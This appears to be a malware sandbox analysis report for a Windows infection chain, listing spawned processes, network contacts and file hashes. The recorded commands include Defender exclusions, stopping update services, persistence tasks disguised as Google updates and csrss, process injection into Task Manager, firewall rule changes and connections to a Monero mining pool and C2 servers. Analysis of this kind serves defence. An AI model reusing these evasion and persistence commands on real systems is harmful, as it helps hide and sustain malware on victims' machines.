
C:\Users\Admin\AppData\Local\Temp\7B18.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BE4.bat" "

C:\Users\Admin\AppData\Local\Temp\7CA0.exe

C:\Users\Admin\AppData\Local\Temp\7CA0.exe

C:\Users\Admin\AppData\Local\Temp\7D1E.exe

C:\Users\Admin\AppData\Local\Temp\7D1E.exe

C:\Users\Admin\AppData\Local\Temp\7DAC.exe

C:\Users\Admin\AppData\Local\Temp\7DAC.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe

C:\Users\Admin\AppData\Local\Temp\7EB7.exe

C:\Users\Admin\AppData\Local\Temp\7EB7.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff810b046f8,0x7ff810b04708,0x7ff810b04718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 224 -ip 224

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 792

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff810b046f8,0x7ff810b04708,0x7ff810b04718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\9879.exe

C:\Users\Admin\AppData\Local\Temp\9879.exe

C:\Users\Admin\AppData\Local\Temp\9A9D.exe

C:\Users\Admin\AppData\Local\Temp\9A9D.exe

C:\Users\Admin\AppData\Local\Temp\9CA2.exe

C:\Users\Admin\AppData\Local\Temp\9CA2.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\A463.exe

C:\Users\Admin\AppData\Local\Temp\A463.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2888 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2940 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,15103402643162731615,17550131249319213560,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp" /SL5="$C01DC,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Lj998Dz.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Lj998Dz.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 5984 -ip 5984

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5840 -ip 5840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 540

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\478A.exe

C:\Users\Admin\AppData\Local\Temp\478A.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 198.209.218.23.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
NL 142.250.179.141:443 accounts.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
RU 85.209.11.85:41140 tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 85.11.209.85.in-addr.arpa udp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.71:4341 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
NL 194.169.175.235:42691 tcp
US 8.8.8.8:53 235.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 a7cd5829-71c3-4b99-a58e-42196ad1275b.uuid.datadumpcloud.org udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.65.182:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 182.65.15.51.in-addr.arpa udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 81.143.68.51.in-addr.arpa udp
US 8.8.8.8:53 stun2.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server14.datadumpcloud.org udp
US 162.159.130.233:443 cdn.discordapp.com tcp
BG 185.82.216.104:443 server14.datadumpcloud.org tcp
IN 172.253.121.127:19302 stun2.l.google.com udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 127.121.253.172.in-addr.arpa udp
US 8.8.8.8:53 104.216.82.185.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
BG 185.82.216.104:443 server14.datadumpcloud.org tcp
FI 77.91.124.86:19084 tcp

Files

memory/4672-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4672-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4672-3-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3232-2-0x0000000002A00000-0x0000000002A16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7A3C.exe

MD5 51aa2ee477e0d873898ad3d8e4d5d235
SHA1 3765dfa792f3f66c5c061c5fd930a690f9fd3965
SHA256 31b7b6e15ebbc483b7b5df24754c925e34b3d6dc2b1a24d100f2a315a407fa64
SHA512 10d7c388e9f544369e145414372d3ae62ef30c3bca27f77216b1961eaca0bcd8ad4531d3a07e6180dc5afcd7302e5e62e2d8e925b701b495bcf1b72d06e0ab9e

C:\Users\Admin\AppData\Local\Temp\7A3C.exe

MD5 51aa2ee477e0d873898ad3d8e4d5d235
SHA1 3765dfa792f3f66c5c061c5fd930a690f9fd3965
SHA256 31b7b6e15ebbc483b7b5df24754c925e34b3d6dc2b1a24d100f2a315a407fa64
SHA512 10d7c388e9f544369e145414372d3ae62ef30c3bca27f77216b1961eaca0bcd8ad4531d3a07e6180dc5afcd7302e5e62e2d8e925b701b495bcf1b72d06e0ab9e

C:\Users\Admin\AppData\Local\Temp\7B18.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\7B18.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\7BE4.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
